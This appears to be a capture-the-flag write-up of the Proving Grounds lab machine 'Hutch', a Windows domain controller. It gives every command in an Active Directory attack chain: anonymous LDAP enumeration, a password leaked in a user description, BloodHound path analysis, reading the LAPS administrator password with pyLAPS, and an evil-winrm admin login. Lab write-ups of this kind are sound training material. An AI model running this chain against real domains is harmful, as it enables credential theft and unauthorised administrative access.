Hutch was a short intermediate Windows domain controller. Due to open ldap permissions, we were able to enumerate the domain users and identify a username and password pair, after more enumeration it was discovered that the user had the ReadLAPSPassword permission enabled leading to administrator login. To begin, I started with my tried and true nmap scanning command. ``` nmap -sC -sV -p- --min-rate 10000 192.168.213.122 ``` ![[Hack The Box/Alert/NmapScan.png]] Judging from the ports I see, it looks like a WIndows domain controller named HUTCHDC. I went ahead and took inventory on the open ports of interest. port 80 - http, standard IIS httpd 10.0 port 88 - kerberos port 389 - LDAP port 445 - SMB port 5985 - WinRM I start my enumeration with these ports and move forward from there. Ill start by checking out port 80. ![[IISDefault.PNG]] It appears to just be an IIS default, Ill further enumerate this if I find nothing down stream. For now Ill move on to LDAP to check for users. I use the ldapsearch command first to enumerate as much as I can. ``` ldapsearch -H ldap://192.168.213.122 -x -s base namingcontexts ``` ![[ldapnamingcontexts.PNG]] Ill go ahead and add the naming contexts to my hosts file before I forget. ![[Proving Grounds/Hutch/HostsFile.PNG]] Ill attempt to further enumerate ldap using the discovered naming contexts. ``` ldapsearch -H ldap://192.168.213.122 -x -b "DC=hutch,DC=offsec" ``` ![[ldapspill.PNG]] I was stunned to see a spill of information! Instead of going through this, Im going to use the ldapdomaindump tool to organize the findings into easy to parse json files. ``` ldapdomaindump -u hutch.offsec\\fmcsorley -p 'CrabSharkJellyfish192' 192.168.213.122 -o ldap/ ``` ![[ldapdump.PNG]] Opening the domain_users.html file, I can clearly see that the user fmcsorley has a very revealing description. ![[domainusers.PNG]] "Password set to CrabSharkJellyfish192 at user's request. Please change on next login." Using that information, I can begin some further enumeration and check to see if the user can log in winrm, I usually would check to see if any of the other users share the same password, but in this case since they are all just "Domain Users" I'm going to push ahead with Freddy. First I checked for any kerberoastable accounts. ``` impacket-GetUserSPNs 'hutch.offsec/fmcsorley:CrabSharkJellyfish192' -k -dc-ip 192.168.213.122 ``` This proved to be unsuccessful. ![[kerberoast.PNG]] Next I checked the shares Freddy has access to using crackmapexec. ``` crackmapexec smb 192.168.213.122 -u fmcsorley -p 'CrabSharkJellyfish192' --shares ``` ![[shares.PNG]] After going through each and every file, I found nothing interesting. Lastly I tried just logging into winrm. ![[WInrmFailure.PNG]] But that failed too. Since I'm working with a domain controller I decided to run bloodhound to get some overview on what Im dealing with here. I went ahead and cloned the bloodhound.py repo here, and began running it. ``` ./bloodhound.py -u fmcsorley -p 'CrabSharkJellyfish192' -d hutch.offsec -c All -ns 192.168.213.122 ``` ![[bloodhoundpython.PNG]] I then zipped up the results. ![[zippy.PNG]] Fired up bloodhound, And loaded the zip into bloodhound. ![[zippsLoad.PNG]] Next, I decided to just immediately check "Find Shortest Paths to Domain Admins" under the Analysis tab and I my next step became very clear... ![[readlapsblood.PNG]] A cool thing about bloodhound is the Abuse information that can be found by clicking on the line and then clicking the question mark. The modal shows you the different ways to abuse the permission on both Linux and Windows. I'm interested on how to abuse it in Linux. According to the overview "The user [email protected] has the ability to read the password set by Local Administrator Password Solution (LAPS) on the computer HUTCHDC.HUTCH.OFFSEC. The local administrator password for a computer managed by LAPS is stored in the confidential LDAP attribute, "ms-mcs-AdmPwd"." And according to the Linux abuse tab, "Sufficient control on a computer object is abusable when the computer's local admin account credential is controlled with LAPS. The clear-text password for the local administrator account is stored in an extended attribute on the computer object called ms-Mcs-AdmPwd. [pyLAPS](https://github.com/p0dalirius/pyLAPS) can be used to retrieve LAPS passwords:" ``` pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword" ``` ![[abuselaps.PNG]] How convenient there is a tool to do just this from the safety of my own shell. I went ahead and downloaded to script using wget from github ``` wget https://raw.githubusercontent.com/p0dalirius/pyLAPS/main/pyLAPS.py ``` ![[wget.PNG]] And ran it as specified in bloodhound. ``` python pyLAPS.py --action get -d "hutch.offsec" -u "fmcsorley" -p "CrabSharkJellyfish192" ``` ![[lapspassword.PNG]] Amazing! its that easy! as a side note, this can also be done in crackmapexec I learned later. using the --laps flag. ![[crackmaplaps.PNG]] Now that I have the administrator password, It should be as easy as using it to winrm into the DC using Evil-WinRM. ``` evil-winrm -i 192.168.213.122 -u administrator -p 'x/3hy0+U7ZTOS+' ``` ![[logedinasadmin.PNG]] And I can grab the proof.txt! ![[prooftxt.PNG]] This was a very satisfying machine, Thanks for reading!